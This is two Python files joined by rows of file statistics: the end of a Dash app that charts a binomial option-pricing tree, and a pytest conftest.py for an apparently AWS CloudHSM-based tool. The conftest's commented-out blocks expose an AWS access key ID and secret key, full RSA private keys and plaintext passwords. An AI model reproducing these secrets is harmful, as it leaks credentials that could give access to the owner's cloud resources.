hoverinfo='none',
showlegend=False,
),
go.Scatter(x=node_x,
y=node_y_NbrOfShares,
mode='markers+text',
marker=dict(size=40),
text=[round(num, 2) for num in nbrofsharesLabel],
showlegend=False,
hoverinfo="none",
),
],
}
# Plot of cash account
@app.callback(
Output('cash_acc', 'figure'),
[Input('memory-output', 'data'),
Input("GraphType","value")])
def graph_cashAccount(data, value):
nbrofsharesLabel, cashLabel, portfolioLabel, optionpriceLabel, intrinsicLabel, stocksLabel, edge_x, edge_y, node_x, node_y, u, d, probUp, probDown, edge_y_Stock, node_y_Stock, edge_y_Intrinsic, node_y_Intrinsic, edge_y_Optionprice, node_y_Optionprice, edge_y_Portfolio, node_y_Portfolio, edge_y_Cash, node_y_Cash, edge_y_NbrOfShares, node_y_NbrOfShares, tree__periods = data
if value == "tree":
return{'layout': go.Layout(title={'yref':"paper",
'y':1,
"yanchor":"bottom"},
showlegend=False,
margin=dict(l=0,
#r=50,
#b=100,
t=15,
#pad=4
),
xaxis={'showgrid': False, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': False,
"title":"Periods"}, # numbers below}
yaxis={'showgrid': False, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': False,
"title":"USD"} # numbers below}
),
'data': [go.Scatter(x=edge_x,
y=edge_y,
mode='lines',
line=dict(width=0.5),
hoverinfo='none',
),
go.Scatter(x=node_x,
y=node_y,
mode='markers+text',
marker=dict(size=40),
text=[round(num, 2) for num in cashLabel],
hoverinfo='none',
),
],
}
else:
return{'layout': go.Layout(title={'yref':"paper",
'y':1,
"yanchor":"bottom"},
margin=dict(l=0, t=15),
xaxis={'showgrid': True,
'zeroline': False,
'visible': True,
"title":"Periods"},
yaxis={'showgrid': True, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': True,
"autorange":True,
"ticks":"outside",
"title":"USD"}, # numbers below}
legend=dict(x=0,
y=1,
traceorder='normal',
bgcolor='rgba(0,0,0,0)'
),
hovermode="closest",
),
'data': [go.Scatter(x=edge_x,
y=edge_y_Cash,
mode='lines',
line=dict(width=0.5),
hoverinfo='none',
showlegend=False,
),
go.Scatter(x=node_x,
y=node_y_Cash,
mode='markers+text',
marker=dict(size=40),
text=[round(num, 2) for num in cashLabel],
showlegend=False,
hoverinfo="none",
),
],
}
# Plot of option price
@app.callback(
Output('option_price', 'figure'),
[Input('memory-output', 'data'),
Input("GraphType", "value")])
def graph_option_pricee(data, value):
nbrofsharesLabel, cashLabel, portfolioLabel, optionpriceLabel, intrinsicLabel, stocksLabel, edge_x, edge_y, node_x, node_y, u, d, probUp, probDown, edge_y_Stock, node_y_Stock, edge_y_Intrinsic, node_y_Intrinsic, edge_y_Optionprice, node_y_Optionprice, edge_y_Portfolio, node_y_Portfolio, edge_y_Cash, node_y_Cash, edge_y_NbrOfShares, node_y_NbrOfShares, tree__periods = data
if value == "tree":
return{'layout': go.Layout(title={'yref':"paper",
'y':1,
"yanchor":"bottom"},
showlegend=False,
margin=dict(l=0,
#r=50,
#b=100,
t=15,
#pad=4
),
xaxis={'showgrid': False, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': False,
"title":"Periods"}, # numbers below}
yaxis={'showgrid': False, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': False,
"title":"USD"} # numbers below}
),
'data': [go.Scatter(x=edge_x,
y=edge_y,
mode='lines',
line=dict(width=0.5),
hoverinfo='none',
),
go.Scatter(x=node_x,
y=node_y,
mode='markers+text',
marker=dict(size=40),
text=[round(num, 2) for num in optionpriceLabel],
hoverinfo='none',
),
],
}
else:
return{'layout': go.Layout(title={'yref':"paper",
'y':1,
"yanchor":"bottom"},
margin=dict(l=0, t=15),
xaxis={'showgrid': True,
'zeroline': False,
'visible': True,
"title":"Periods"},
yaxis={'showgrid': True, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': True,
"autorange":True,
"ticks":"outside",
"title":"USD"}, # numbers below}
legend=dict(x=0,
y=1,
traceorder='normal',
bgcolor='rgba(0,0,0,0)'
),
hovermode="closest",
),
'data': [go.Scatter(x=edge_x,
y=edge_y_Portfolio,
mode='lines',
line=dict(width=0.5),
hoverinfo='none',
showlegend=False,
),
go.Scatter(x=node_x,
y=node_y_Optionprice,
mode='markers+text',
marker=dict(size=40),
text=[round(num, 2) for num in optionpriceLabel],
showlegend=False,
hoverinfo="none",
),
],
}
# Plot of option intrinsic value
@app.callback(
Output('option_intrinsic', 'figure'),
[Input('memory-output', 'data'),
Input("GraphType", "value")])
def graph_optionIntrinsicValue(data,value):
nbrofsharesLabel, cashLabel, portfolioLabel, optionpriceLabel, intrinsicLabel, stocksLabel, edge_x, edge_y, node_x, node_y, u, d, probUp, probDown, edge_y_Stock, node_y_Stock, edge_y_Intrinsic, node_y_Intrinsic, edge_y_Optionprice, node_y_Optionprice, edge_y_Portfolio, node_y_Portfolio, edge_y_Cash, node_y_Cash, edge_y_NbrOfShares, node_y_NbrOfShares, tree__periods = data
if value == "tree":
return{'layout': go.Layout(title={'yref':"paper",
'y':1,
"yanchor":"bottom"},
showlegend=False,
margin=dict(l=0,
#r=50,
#b=100,
t=15,
#pad=4
),
xaxis={'showgrid': False, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': False,
"title":"Periods"}, # numbers below}
yaxis={'showgrid': False, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': False,
"title":"USD"} # numbers below}
),
'data': [go.Scatter(x=edge_x,
y=edge_y,
mode='lines',
line=dict(width=0.5),
hoverinfo='none',
showlegend=False,
),
go.Scatter(x=node_x,
y=node_y,
mode='markers+text',
marker=dict(size=40),
text=[round(num, 2) for num in intrinsicLabel],
showlegend=False,
hoverinfo="none",
),
],
}
else:
return{'layout': go.Layout(title={'yref':"paper",
'y':1,
"yanchor":"bottom"},
margin=dict(l=0, t=15),
xaxis={'showgrid': True,
'zeroline': False,
'visible': True,
"title":"Periods"},
yaxis={'showgrid': True, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': True,
"autorange":True,
"ticks":"outside",
"title":"USD"}, # numbers below}
legend=dict(x=0,
y=1,
traceorder='normal',
bgcolor='rgba(0,0,0,0)'
),
hovermode="closest",
),
'data': [go.Scatter(x=edge_x,
y=edge_y_Intrinsic,
mode='lines',
line=dict(width=0.5),
hoverinfo='none',
showlegend=False,
),
go.Scatter(x=node_x,
y=node_y_Intrinsic,
mode='markers+text',
marker=dict(size=40),
text=[round(num, 2) for num in intrinsicLabel],
showlegend=False,
hoverinfo="none",
),
],
}
# User input checks
@app.callback(Output('message_S', 'children'),
[Input('S', 'value')])
def check_input_S(S):
if S<0:
return f'Cannot be lower than 0.'
else:
return ""
@app.callback(Output('message_K', 'children'),
[Input('K', 'value')])
def check_input_K(K):
if K<0:
return f'Cannot be lower than 0.'
else:
return ""
@app.callback(Output('message_tree', 'children'),
[Input('tree_periods', 'value')])
def check_input_K(tree__periods):
if tree__periods<1:
return f'Cannot be lower than 1.'
else:
return ""
# Input visuals
@app.callback(Output('drift', 'children'),
[Input('mu', 'value')])
def display_value(value):
return f': {int(value*100)}%'
@app.callback(Output('sigma', 'children'),
[Input('vol', 'value')])
def display_value2(value):
return f': {int(value*100)}%'
@app.callback(Output('riskfree', 'children'),
[Input('Rf', 'value')])
def display_value3(value):
return f': {int(value*100)}%'
@app.callback(Output('matu', 'children'),
[Input('T', 'value')])
def display_value4(value):
if value==0.25 or value==0.5 or value==0.75:
return f": {int(value*12)} months"
elif value == 1:
return f': {value} year'
else:
return f': {value} years'
# Excel export
@app.callback(Output("download", "data"),
[Input("btn", "n_clicks")],
[State('memory-output', 'data')])
def generate_xlsx(n_clicks, data):
nbrofsharesLabel, cashLabel, portfolioLabel, optionpriceLabel, intrinsicLabel, stocksLabel, edge_x, edge_y, node_x, node_y, u, d, probUp, probDown, edge_y_Stock, node_y_Stock, edge_y_Intrinsic, node_y_Intrinsic, edge_y_Optionprice, node_y_Optionprice, edge_y_Portfolio, node_y_Portfolio, edge_y_Cash, node_y_Cash, edge_y_NbrOfShares, node_y_NbrOfShares, tree__periods = data
nbrofsharesLabel, cashLabel, portfolioLabel, optionpriceLabel, intrinsicLabel, stocksLabel = np.array(nbrofsharesLabel), np.array(cashLabel), np.array(portfolioLabel), np.array(optionpriceLabel), np.array(intrinsicLabel), np.array(stocksLabel)
list_of_outputs = (stocksLabel, intrinsicLabel, portfolioLabel, optionpriceLabel, nbrofsharesLabel, cashLabel)
list_of_names = ["Stock simulation", "Option intrinsic value", "Portfolio", "Option price", "Number of shares", "Cash account"]
endbis, startbis = [0], [0]
endstep, startstep = np.arange(2,tree__periods+2), np.arange(1,tree__periods+1)
for i in range(len(endstep)):
endbis.append(endbis[i]+endstep[i])
for i in range(len(startstep)):
startbis.append(startbis[i]+startstep[i])
def to_xlsx(bytes_io):
counter = 0
xslx_writer = pd.ExcelWriter(bytes_io, engine="xlsxwriter")
for output in list_of_outputs:
temp = pd.DataFrame(index=np.arange(0,tree__periods+1))
temp.loc[:,0] = pd.Series(output[0])
for j in range(1, tree__periods+1):
temp.loc[:, j] = pd.Series(output[startbis[j]:endbis[j]+1])
temp.index = np.arange(1, tree__periods+2)
temp.to_excel(xslx_writer, sheet_name=f"{list_of_names[counter]}")
counter += 1
xslx_writer.save()
return send_bytes(to_xlsx, "rawdata.xlsx")
# Opening/Closing top-right About button
@app.callback(
Output("popover", "is_open"),
[Input("popover-target", "n_clicks")],
[State("popover", "is_open")],
)
def toggle_popover(n, is_open):
if n:
return not is_open
return is_open
# Main function, runs the app
if __name__ == '__main__':
app.run_server(debug=True)
| 47.045267
| 445
| 0.388879
| 2,831
| 34,296
| 4.554928
| 0.106323
| 0.029081
| 0.024816
| 0.019542
| 0.764482
| 0.750213
| 0.743079
| 0.730361
| 0.730361
| 0.716402
| 0
| 0.01534
| 0.511488
| 34,296
| 728
| 446
| 47.10989
| 0.754327
| 0.054671
| 0
| 0.771028
| 0
| 0.001558
| 0.095932
| 0.000742
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02648
| false
| 0
| 0.024922
| 0.004673
| 0.076324
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
077304a77e7ead1312213100fc56049be0e888c1
| 71,801
|
py
|
Python
|
conftest.py
|
altmirai/piggycli
|
c1b1944fc03ebc220df8ca6284d46148fdf087a6
|
[
"MIT"
] | null | null | null |
conftest.py
|
altmirai/piggycli
|
c1b1944fc03ebc220df8ca6284d46148fdf087a6
|
[
"MIT"
] | null | null | null |
conftest.py
|
altmirai/piggycli
|
c1b1944fc03ebc220df8ca6284d46148fdf087a6
|
[
"MIT"
] | null | null | null |
from app.models.certificate_model import Certs
from app.models.ssh_key_model import SSHKey
from tests.data.aws_call_fixtures import *
from tests.data.model_fixtures import *
import tests.data as data
import botocore.session
from botocore.stub import Stubber, ANY
from unittest.mock import patch, Mock
import pytest
import os
def delete_files_and_folders():
cluster_folder = data.test_cluster_path
# piggy_folder = os.path.join(data.test_path, '.piggy')
test_files_folder = os.path.join(data.test_base_path)
folders = [cluster_folder, test_files_folder]
# folders = [cluster_folder, piggy_folder, test_files_folder]
for folder in folders:
if os.path.isdir(folder):
files = os.listdir(folder)
for file in files:
assert os.path.isdir(
file) is False, 'Unexepected file structure.'
os.remove(os.path.join(folder, file))
os.rmdir(folder)
def pytest_sessionstart(session):
if os.path.isdir(data.test_base_path):
delete_files_and_folders()
os.mkdir(data.test_base_path)
def pytest_sessionfinish(session, exitstatus):
delete_files_and_folders()
# class CredentialsData:
# def __init__(self):
# self.test_path = '/Users/kyle/GitHub/alt-piggy-bank/piggy-cli/tests/test_files'
# self.production_path = '/Users/kyle/GitHub/alt-piggy-bank/piggy-cli/production_files'
# self.aws_region = 'us-east-2'
# self.ssh_key_name = 'Piggy_SSH_Key_cf865bae'
# self.cluster_id = 'cluster-lbtkdldygfh'
# self.instance_id = 'i-051bdb2ae099024a5'
# self.aws_access_key_id = 'AKIA5YNNN4JH6JDQF5XH'
# self.aws_secret_access_key = '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'
# self.customer_ca_key_password = 'password1'
# self.crypto_officer_password = 'password1'
# self.crypto_user_username = 'cryptouser'
# self.crypto_user_password = 'password1'
# self.KeyFingerprint = '08:c9:28:e5:24:38:d5:ef:9b:a1:76:22:9f:00:0c:eb:47:16:59:cd'
# self.KeyMaterial = '-----BEGIN RSA PRIVATE KEY-----\nMIIEpQIBAAKCAQEAkOrCB3e0Fj/Cv797THZn5YgxIPywNdlg284rMSshrLl8QC83\n0ck0K9CP3Y+rCuHGx7t/2tCtl66uKlwOPFvWGDi+akonkUeVqnV8U1z5jNhI8SwY\niXtcFX0twIGHaaxYQrWZvOUAnmE8JUGd7Pysy4Sy7/ZEldXwEN3fN2NIPRnQwii7\nS5tv573C2am2MMXtwEKtQi3uWgPu//maXqoM0/PuxTDk9DUKnN88nvNBMoTlHr1P\nl9QsHMPyXvJ/+TTPdVybXwMvv1KgCMeGid43CPu7SFa8trx9DuvSY03TwYyhZIp6\nMsPZot6pu+opRXgF7SkSpp/+ABPoA836sPF0+wIDAQABAoIBAAESi68Mdru3axSK\nMTpmoewz7tEkrZUob6wQwYcSn6QslzvOXaZiy80LNRVZq9VfyF3QCGkxJCe8NjPA\nDKbrsxDo0pfsxpAvrG7fgbUIOhyNuTR3tBLIY+0QyRbknoDsspaDy4h3VWLWq2BH\nNQj88bZr2/skomtNcwJc8frx9CXnmR1erB8d7UybKFiYL4ggM/MVQbdn66ZpmKCK\naZ774lbgdiwp8YZp1ANFw7zBr1MTqXKLmghtYZoornRUVk2c3OPUII62jmarUaqn\nKL+q2198j0axDsmFCAALTbmxjo//XWxwTeaRNwsi0hqeENEy1ywtidn1A8eHJaOi\nvGlV6LkCgYEA4rabAGB7OQTunGj6BiQBN8AnG/1B77HBA/VRy3YUHdPaBYtldLuX\nZrQKuE3l13uX0whXr+BQVDtDiegocz4r41/MR9uUoQFHnsL25D+A44xveT2scTHm\nBHpUprq8ti4XyNJGpnZXSxQCRzhcGnJItvfOaQWW+slEnR4RUuWCdjUCgYEAo6Mn\nmT+NyNCfJHWvF951fvRi7liktRzIcIL7Hu4gDkTTJ7U/Ms3OgQTsQ6VIfNeotAYC\nFe/GVb+SB91MnnCFwPbwt1vIwdLGvKtAUq3OQvE8Jv1LCC3XQJcRv/tJuP6lLz1t\nWNF59Uz0Ar6VN9tIctdribKGP6Dxg32OLlrV5G8CgYEAotnQlYC4gsjMLYYqsuaC\nCW35qd1N08O3hgRd8OysnpBi98Cd7DAkHR4O5TzvcM3SzUAc3LUgfqDjbthY1g8+\nr2FM+AD+zniA3cXmWyZSiyGBoXFvwQ+6zlShIfLZQ3PwmcyR+1jec4u35zjQ0B5v\npR50InRlc1fH9aR3hThfclECgYEAh+bv80GqIpbJJQGsKnmyQX78TxFFsbk26uKN\nZxHDg7Y7XCYWV74/fD23bzLtMen2DZVT1B4wLXUN9gQgJxIys6EjKFVNNVQ1g+oC\nYOhCfqxVFdiVoTRZKiaNMlGj18V9MO+mSfangEep/EGGMj6nO+GXSWQARQYIrvju\nxabhL3cCgYEAlPAbQgqljbfs6pIG5eEKHNLXaCZxFeZDQ+PQ9CYBsCL0nPo0e1iw\nHNFx2A/BN0hEZxiOO0LnDV5paFhAd+rFhSvxdgwhOBvxU1TDwcNCoyqpbJ57BB3e\n5d+ShkCu0K3LbKn65ZAtvJCB9yleu5VUIt6i+q/aaPLcWTcf+YxVDfM=\n-----END RSA PRIVATE KEY-----'
# self.KeyName = 'Piggy_SSH_Key_0194afd1'
# self.KeyPairId = 'key-0a070814c64fa0e65'
# self.KeyFingerprint2 = 'de:7b:e3:aa:81:52:89:be:a5:01:a0:87:8d:67:76:47:e8:a5:9f:0c'
# self.KeyName2 = 'Piggy_SSH_Key_40cc19f5'
# self.KeyPairId2 = 'key-071d152e1ec5428df'
# self.pem_csr = '-----BEGIN CERTIFICATE REQUEST-----\nMIIC0TCCAbkCAQAwgYsxRDAJBgNVBAYTAlVTMAkGA1UECAwCQ0EwDQYDVQQKDAZD\nYXZpdW0wDQYDVQQLDAZOM0ZJUFMwDgYDVQQHDAdTYW5Kb3NlMUMwQQYDVQQDDDpI\nU006QjRGMUU4QjY3OTY3NTg2M0Y4REIzMjExMTM2NEIzOlBBUlROOjEzLCBmb3Ig\nRklQUyBtb2RlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvDY9IZlR\nThUQ2Jfc+JWPC15WqZbMRKiEba+FICcwno+izaDza+rzpqtaU0Q5UVYGOe4vEtVj\nxsj3hdhXc2rK53vhw4EdmKojPzAy3F/TJGzSvzIlPUCdWLtbKlNEkg/VGu1YcsMV\nvQvyGFSusj8idWT4DvsZxPuEwiXE4qEPmyB1uo2lKIYWfulP9QrRdvnrBF/zBmXO\nblg3zHf1KQ8bYWW8Lc/DGcRnRvPBfDvYNS6DJPrMiM+QeqhM5Iegu7OlTOTkV72d\nmaMqTuuWOGrb6LCDr7hWGfjAE3517Jt2ia2bB8YE5Wda4mUBEmpVl5Kho547S6Sx\nMiChX3U3VCHbVwIDAQABoAAwDQYJKoZIhvcNAQELBQADggEBAKqEhDqVClGRES2C\nIwqKxPVYo5lbynEZ94qSeKzI9rgoW3kPVyro1vBxAzMwDSJd1TXmw2fJAOY7Zdiw\n+j0SMZCb81ehVNa8VRUsOrU6phC72jqUSFSWpRkCDxc9inIdUfBpqIQxsd0JpYB7\nzvyuKILMNDI3Ys7S4i1ErHv8IyDUdmVjP+qRaEAhecBEt5GVZPDg/vjEsS83hqf4\n7EZ9S9noDgnoa79W1ovFr8wW8EZ5Spi50D5hsFCMy4a4rErwneAATEm2MmtLfIy7\nCWTUET6SZN2Ncn/oM1ulVYofYTctmpiAGMMjB9joA6nW0I2QfhaSOTugU+NmwnC0\nOo+qHwM=\n-----END CERTIFICATE REQUEST-----\n'
# self.passphrase = 'password1'
# self.pem_private_key = b'-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: AES-256-CBC,6F7135B1FF40772431A52344F2C28F3E\n\n17swNOMYJtX7XSMnL9C6MPmIaI34peR4CPUt0IWaiu5AfuHeGrho2PhaljlKX/Lt\nw4ykD/zrrKk88BrhTTPhArJNOporxC8d2BeyXtiIXqz4+yn256Ox4zfzkAdGq2xq\nRRzNHZot417yqUcIUSI+H39WkHVunhpNWJixMFKp5yhTf1JUHXCNOPNr4M/aALFD\n9U1pJ4t1H0umrNdHKI7lWat5+lnfXPe9GrQ+NYYobM6MX6uM7Mb9ggzN0234rOQM\nhLYdMGUCvXrWUoVHQ7mRR/DBa4S2ptAbyHsQZCOLLvnfQE+lCpT8SxkUf3xyeRGC\njGqHWANEHbdW7LKNS9aSbjoM5fXx9ToJJJiFAo4RuFVpTufVh8zhPscx1DjvVXLQ\nPo1WZrZusELmhzvJOgJQkNvrVnfGmHtB6CuzHUyXAriN1VUekWlNYi3gP5fC5MjO\n+bISUXiGLHi0DYe+x+0PHquI/u5Gugeh/k+q7pvbTnZ/r9so+P4aW2q1IDloFYXv\nDVO3VGdSef3mp1k4B49257K5Vri1XYjLXAkbQyuVFGWphQ4bSHCscZhAevpzCDVk\nPrD0R+egohy/ErZllbp7+rc+VpHMBXpi5LEYAetpdR5URrgZAP5L2WWS4/WtsoAb\nnApoqMuq53QaOjjWx2wTtyU1lOGoT5pSS4/c1UKxV/72Dpbu96e8MBhjwwmIZiGW\nD5fjHJzEDZxtA/YFS1UHxb8hPsMRJkb67dR1fOSDXBWLZdi0MQ1que60bXV4+a8W\nJTKzpf8yOaNkI98QqGcvbfZWcgQ/sMVduOrx1VsndFqXiJ4M5heCAU+3gKAaX9HG\nkoYtTnp+LbshZNawdyW1MtdeeP8zrVfAx+WrYcI8/XL7+tge4n6VkVoqxD6IJX3a\nZ6EPY/J/IBSQsYIeQe4QDrjR1ztbNBS4KMBlJofM3IlPY5ee9L61QBwCW9zM9FNI\n8s54O2D3nGgc5fGteB5Ze4qGDFshPKXJU5uFcSZ19202NhuPTeWkuCFXMSz41eRL\n3kog6OW5q3UNPgMAb9nmuQzDt7fALY9fzl3n6CV/lli68oP8ji8iqqTvP5tjkgQa\nVC5IY97qs0JoeEnORSMo0SdnL/4YK5eni5pZxR1pvdXV0t4Vqap0f2SEi0yL8HxA\nLtmCTYdD9e/IEFcPjoFp/M5NcPUP81S8gJUwLWo9eI2Cpe7tZBrdWHQ6Z8Kc3mQQ\nflT5wXps/H9CmVkDFIu/VuOLxHxVzl7L20a8zkZDRhqnij/IqG+UM27dZ/Rc48Vu\nG7S4um6eahANe7r2n4gDApQBlziUApR5PIeZUFpKELTNKJ4BY1Ttsmt+y3EDU8Uk\nBt38zSYs251WmKjuRwR99dny7p+jjxBdJSW5xpoSv7/DdH9UaF2PhAXetdeYRWnt\nu2lshQzrZBruQpcSCbFS3FvmlNlKc4zoSt9lNp+NgGLZzbLciSQhF5+nyz2k+K26\nZyTbjiaWhK+AfxtgWG84iuJI7DtcuP1MRuud0aV9PZV/KZ8X1AnqDsxCUsUwjtAj\nM5PTCWRL0tSkQKRue8iueN498DdzlK+QqkRGdN3j/YTmh8KZzLvjiUxAUPXByjaV\n-----END RSA PRIVATE KEY-----\n'
# @property
# def credentials_kwargs(self):
# return {
# 'aws_region': data.aws_region,
# 'ssh_key_name': data.ssh_key_name,
# 'cluster_id': data.cluster_id,
# 'instance_id': data.instance_id,
# 'aws_access_key_id': data.aws_access_key_id,
# 'aws_secret_access_key': data.aws_secret_access_key,
# 'customer_ca_key_password': data.customer_ca_key_password,
# 'crypto_officer_password': data.crypto_officer_password,
# 'crypto_user_username': data.crypto_user_username,
# 'crypto_user_password': data.crypto_user_password,
# }
# @property
# def ssh_key_create_resp(self):
# return {
# 'KeyFingerprint': self.KeyFingerprint,
# 'KeyMaterial': self.KeyMaterial,
# 'KeyName': self.KeyName,
# 'KeyPairId': self.KeyPairId
# }
# @property
# def ssh_key_describe_resp(self):
# return {
# 'KeyPairs': [
# {
# 'KeyPairId': self.KeyPairId,
# 'KeyFingerprint': self.KeyFingerprint,
# 'KeyName': self.KeyName,
# 'Tags': []
# },
# {
# 'KeyPairId': self.KeyPairId2,
# 'KeyFingerprint': self.KeyFingerprint2,
# 'KeyName': self.KeyName2,
# 'Tags': []
# }
# ]}
# @property
# def ssh_key_kwargs(self):
# return {
# 'id': self.KeyPairId,
# 'name': self.KeyName,
# 'material': self.KeyMaterial,
# 'fingerprint': self.KeyFingerprint
# }
# @property
# def certs_kwargs(self):
# return {
# 'pem_csr': self.pem_csr,
# 'passphrase': self.passphrase
# }
# t = CredentialsData()
# class CredentialsData:
# def __init__(self):
# self.test_path = '/Users/kyle/GitHub/alt-piggy-bank/piggy-cli/tests/test_files'
# self.production_path = '/Users/kyle/GitHub/alt-piggy-bank/piggy-cli/production_files'
# self.aws_region = 'us-east-2'
# self.ssh_key_name = 'Piggy_SSH_Key_cf865bae'
# self.cluster_id = 'cluster-lbtkdldygfh'
# self.instance_id = 'i-051bdb2ae099024a5'
# self.aws_access_key_id = 'AKIA5YNNN4JH6JDQF5XH'
# self.aws_secret_access_key = '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'
# self.customer_ca_key_password = 'password1'
# self.crypto_officer_password = 'password1'
# self.crypto_user_username = 'cryptouser'
# self.crypto_user_password = 'password1'
# self.KeyFingerprint = '08:c9:28:e5:24:38:d5:ef:9b:a1:76:22:9f:00:0c:eb:47:16:59:cd'
# self.KeyMaterial = '-----BEGIN RSA PRIVATE KEY-----\nMIIEpQIBAAKCAQEAkOrCB3e0Fj/Cv797THZn5YgxIPywNdlg284rMSshrLl8QC83\n0ck0K9CP3Y+rCuHGx7t/2tCtl66uKlwOPFvWGDi+akonkUeVqnV8U1z5jNhI8SwY\niXtcFX0twIGHaaxYQrWZvOUAnmE8JUGd7Pysy4Sy7/ZEldXwEN3fN2NIPRnQwii7\nS5tv573C2am2MMXtwEKtQi3uWgPu//maXqoM0/PuxTDk9DUKnN88nvNBMoTlHr1P\nl9QsHMPyXvJ/+TTPdVybXwMvv1KgCMeGid43CPu7SFa8trx9DuvSY03TwYyhZIp6\nMsPZot6pu+opRXgF7SkSpp/+ABPoA836sPF0+wIDAQABAoIBAAESi68Mdru3axSK\nMTpmoewz7tEkrZUob6wQwYcSn6QslzvOXaZiy80LNRVZq9VfyF3QCGkxJCe8NjPA\nDKbrsxDo0pfsxpAvrG7fgbUIOhyNuTR3tBLIY+0QyRbknoDsspaDy4h3VWLWq2BH\nNQj88bZr2/skomtNcwJc8frx9CXnmR1erB8d7UybKFiYL4ggM/MVQbdn66ZpmKCK\naZ774lbgdiwp8YZp1ANFw7zBr1MTqXKLmghtYZoornRUVk2c3OPUII62jmarUaqn\nKL+q2198j0axDsmFCAALTbmxjo//XWxwTeaRNwsi0hqeENEy1ywtidn1A8eHJaOi\nvGlV6LkCgYEA4rabAGB7OQTunGj6BiQBN8AnG/1B77HBA/VRy3YUHdPaBYtldLuX\nZrQKuE3l13uX0whXr+BQVDtDiegocz4r41/MR9uUoQFHnsL25D+A44xveT2scTHm\nBHpUprq8ti4XyNJGpnZXSxQCRzhcGnJItvfOaQWW+slEnR4RUuWCdjUCgYEAo6Mn\nmT+NyNCfJHWvF951fvRi7liktRzIcIL7Hu4gDkTTJ7U/Ms3OgQTsQ6VIfNeotAYC\nFe/GVb+SB91MnnCFwPbwt1vIwdLGvKtAUq3OQvE8Jv1LCC3XQJcRv/tJuP6lLz1t\nWNF59Uz0Ar6VN9tIctdribKGP6Dxg32OLlrV5G8CgYEAotnQlYC4gsjMLYYqsuaC\nCW35qd1N08O3hgRd8OysnpBi98Cd7DAkHR4O5TzvcM3SzUAc3LUgfqDjbthY1g8+\nr2FM+AD+zniA3cXmWyZSiyGBoXFvwQ+6zlShIfLZQ3PwmcyR+1jec4u35zjQ0B5v\npR50InRlc1fH9aR3hThfclECgYEAh+bv80GqIpbJJQGsKnmyQX78TxFFsbk26uKN\nZxHDg7Y7XCYWV74/fD23bzLtMen2DZVT1B4wLXUN9gQgJxIys6EjKFVNNVQ1g+oC\nYOhCfqxVFdiVoTRZKiaNMlGj18V9MO+mSfangEep/EGGMj6nO+GXSWQARQYIrvju\nxabhL3cCgYEAlPAbQgqljbfs6pIG5eEKHNLXaCZxFeZDQ+PQ9CYBsCL0nPo0e1iw\nHNFx2A/BN0hEZxiOO0LnDV5paFhAd+rFhSvxdgwhOBvxU1TDwcNCoyqpbJ57BB3e\n5d+ShkCu0K3LbKn65ZAtvJCB9yleu5VUIt6i+q/aaPLcWTcf+YxVDfM=\n-----END RSA PRIVATE KEY-----'
# self.KeyName = 'Piggy_SSH_Key_0194afd1'
# self.KeyPairId = 'key-0a070814c64fa0e65'
# self.KeyFingerprint2 = 'de:7b:e3:aa:81:52:89:be:a5:01:a0:87:8d:67:76:47:e8:a5:9f:0c'
# self.KeyName2 = 'Piggy_SSH_Key_40cc19f5'
# self.KeyPairId2 = 'key-071d152e1ec5428df'
# self.pem_csr = '-----BEGIN CERTIFICATE REQUEST-----\nMIIC0TCCAbkCAQAwgYsxRDAJBgNVBAYTAlVTMAkGA1UECAwCQ0EwDQYDVQQKDAZD\nYXZpdW0wDQYDVQQLDAZOM0ZJUFMwDgYDVQQHDAdTYW5Kb3NlMUMwQQYDVQQDDDpI\nU006QjRGMUU4QjY3OTY3NTg2M0Y4REIzMjExMTM2NEIzOlBBUlROOjEzLCBmb3Ig\nRklQUyBtb2RlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvDY9IZlR\nThUQ2Jfc+JWPC15WqZbMRKiEba+FICcwno+izaDza+rzpqtaU0Q5UVYGOe4vEtVj\nxsj3hdhXc2rK53vhw4EdmKojPzAy3F/TJGzSvzIlPUCdWLtbKlNEkg/VGu1YcsMV\nvQvyGFSusj8idWT4DvsZxPuEwiXE4qEPmyB1uo2lKIYWfulP9QrRdvnrBF/zBmXO\nblg3zHf1KQ8bYWW8Lc/DGcRnRvPBfDvYNS6DJPrMiM+QeqhM5Iegu7OlTOTkV72d\nmaMqTuuWOGrb6LCDr7hWGfjAE3517Jt2ia2bB8YE5Wda4mUBEmpVl5Kho547S6Sx\nMiChX3U3VCHbVwIDAQABoAAwDQYJKoZIhvcNAQELBQADggEBAKqEhDqVClGRES2C\nIwqKxPVYo5lbynEZ94qSeKzI9rgoW3kPVyro1vBxAzMwDSJd1TXmw2fJAOY7Zdiw\n+j0SMZCb81ehVNa8VRUsOrU6phC72jqUSFSWpRkCDxc9inIdUfBpqIQxsd0JpYB7\nzvyuKILMNDI3Ys7S4i1ErHv8IyDUdmVjP+qRaEAhecBEt5GVZPDg/vjEsS83hqf4\n7EZ9S9noDgnoa79W1ovFr8wW8EZ5Spi50D5hsFCMy4a4rErwneAATEm2MmtLfIy7\nCWTUET6SZN2Ncn/oM1ulVYofYTctmpiAGMMjB9joA6nW0I2QfhaSOTugU+NmwnC0\nOo+qHwM=\n-----END CERTIFICATE REQUEST-----\n'
# self.passphrase = 'password1'
